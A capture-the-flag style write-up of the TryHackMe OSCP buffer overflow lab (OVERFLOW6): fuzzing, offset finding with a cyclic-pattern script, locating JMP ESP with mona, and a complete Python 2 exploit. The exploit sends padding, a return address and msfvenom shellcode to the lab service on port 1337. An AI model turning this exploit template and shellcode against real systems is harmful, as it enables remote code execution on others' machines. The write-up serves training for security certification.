TryHackme! — OSCP Buffer Overflow

Log in and open the dashboard for the module: Buffer Overflow Prep.
Select the HOME network when asked.
The task says the service runs on port 1337.
Since we are exploiting OVERFLOW6, we use the OVERFLOW6 command to see what input is sent and what output we get back.
fuzzing.py
Running fuzzing.py.
Attach oscp.exe in the debugger and press run.
"Running" is shown in the bottom-right corner.
We will use this value in the offset-finding Python script.
The offset is the same value generated by the metasploit-framework pattern_create Ruby script.
"Paused" is shown in the bottom-right corner. The pattern we created is also visible in the registers, with EIP holding 35694234.
We see the exact match is at 1034.
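To show why an EIP of 35694234 maps to offset 1034, here is an added Python 3 example (not part of the original write-up); it re-creates the pattern_create/pattern_offset logic locally instead of calling the Metasploit scripts, and the pattern length of 2000 is an assumption.

```python
import string

# Alphabet of the Metasploit pattern: every 3-byte chunk is UPPER + lower + digit.
UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def cyclic_pattern(length):
    """Re-create the pattern_create.rb output (Aa0Aa1Aa2...Aa9Ab0...) of the given length.
    Every 3-byte chunk is unique, so 4 consecutive bytes found in EIP pin down one
    position in the buffer."""
    chunks = []
    for up in UPPER:
        for lo in LOWER:
            for d in DIGITS:
                chunks.append(up + lo + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def eip_to_chars(eip_hex):
    """Turn the EIP value as the debugger prints it (e.g. '35694234') into the 4
    characters that sat in memory. x86 is little-endian, so the byte order is
    reversed: 34 42 69 35 -> '4Bi5'."""
    return int(eip_hex, 16).to_bytes(4, "little").decode("latin-1")


def pattern_offset(eip_hex, length=2000):
    """Offset of the EIP characters inside the pattern, or -1 when EIP does not hold
    pattern bytes (i.e. our input did not reach the saved return address)."""
    return cyclic_pattern(length).find(eip_to_chars(eip_hex))


if __name__ == "__main__":
    # The debugger in the write-up showed EIP = 35694234 after the crash.
    print(pattern_offset("35694234"))  # -> 1034
```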
We see EIP is overwritten with B (hex \x42).
Nothing different happens to ESP and EIP.
Typing !mona modules in the bottom-left corner lists all modules identified by mona.
JMP ESP is FF E4 in hex.
We see we have at least 6 different addresses in essfunc.dll containing JMP ESP.
We see we have JMP ESP at this address.
The breakpoint is hit and the program is paused.
#!/usr/bin/python
# Python 2 script: string literals hold raw bytes and print is a statement.
import sys,socket
from time import sleep
payload = ("\xba\xcb\xbe\xb2\x9c\xda\xd9\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x52\x83\xe8\xfc\x31\x50\x0e\x03\x9b\xb0\x50\x69\xe7\x25\x16"
"\x92\x17\xb6\x77\x1a\xf2\x87\xb7\x78\x77\xb7\x07\x0a\xd5\x34"
"\xe3\x5e\xcd\xcf\x81\x76\xe2\x78\x2f\xa1\xcd\x79\x1c\x91\x4c"
"\xfa\x5f\xc6\xae\xc3\xaf\x1b\xaf\x04\xcd\xd6\xfd\xdd\x99\x45"
"\x11\x69\xd7\x55\x9a\x21\xf9\xdd\x7f\xf1\xf8\xcc\x2e\x89\xa2"
"\xce\xd1\x5e\xdf\x46\xc9\x83\xda\x11\x62\x77\x90\xa3\xa2\x49"
"\x59\x0f\x8b\x65\xa8\x51\xcc\x42\x53\x24\x24\xb1\xee\x3f\xf3"
"\xcb\x34\xb5\xe7\x6c\xbe\x6d\xc3\x8d\x13\xeb\x80\x82\xd8\x7f"
"\xce\x86\xdf\xac\x65\xb2\x54\x53\xa9\x32\x2e\x70\x6d\x1e\xf4"
"\x19\x34\xfa\x5b\x25\x26\xa5\x04\x83\x2d\x48\x50\xbe\x6c\x05"
"\x95\xf3\x8e\xd5\xb1\x84\xfd\xe7\x1e\x3f\x69\x44\xd6\x99\x6e"
"\xab\xcd\x5e\xe0\x52\xee\x9e\x29\x91\xba\xce\x41\x30\xc3\x84"
"\x91\xbd\x16\x0a\xc1\x11\xc9\xeb\xb1\xd1\xb9\x83\xdb\xdd\xe6"
"\xb4\xe4\x37\x8f\x5f\x1f\xd0\xba\x9b\x13\x71\xd3\xa1\x2b\x71"
"\x73\x2f\xcd\x1b\x63\x79\x46\xb4\x1a\x20\x1c\x25\xe2\xfe\x59"
"\x65\x68\x0d\x9e\x28\x99\x78\x8c\xdd\x69\x37\xee\x48\x75\xed"
"\x86\x17\xe4\x6a\x56\x51\x15\x25\x01\x36\xeb\x3c\xc7\xaa\x52"
"\x97\xf5\x36\x02\xd0\xbd\xec\xf7\xdf\x3c\x60\x43\xc4\x2e\xbc"
"\x4c\x40\x1a\x10\x1b\x1e\xf4\xd6\xf5\xd0\xae\x80\xaa\xba\x26"
"\x54\x81\x7c\x30\x59\xcc\x0a\xdc\xe8\xb9\x4a\xe3\xc5\x2d\x5b"
"\x9c\x3b\xce\xa4\x77\xf8\xfe\xee\xd5\xa9\x96\xb6\x8c\xeb\xfa"
"\x48\x7b\x2f\x03\xcb\x89\xd0\xf0\xd3\xf8\xd5\xbd\x53\x11\xa4"
"\xae\x31\x15\x1b\xce\x13")
# 1034 bytes of padding to reach EIP, the essfunc.dll JMP ESP address (little-endian),
# a 16-byte NOP sled, then the msfvenom payload.
shellcode = "A" * 1034 + "\xaf\x11\x50\x62" + "\x90"*16 + payload + "\r\n"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.10.152.174', 1337))
    s.send("OVERFLOW6 " + shellcode)
    s.recv(1024)
    s.close()
except:
    print "Error Connecting to server"
    sys.exit()

Dhanishtha Awasthi

OSCP | CEH | Cyber Security Enthusiast.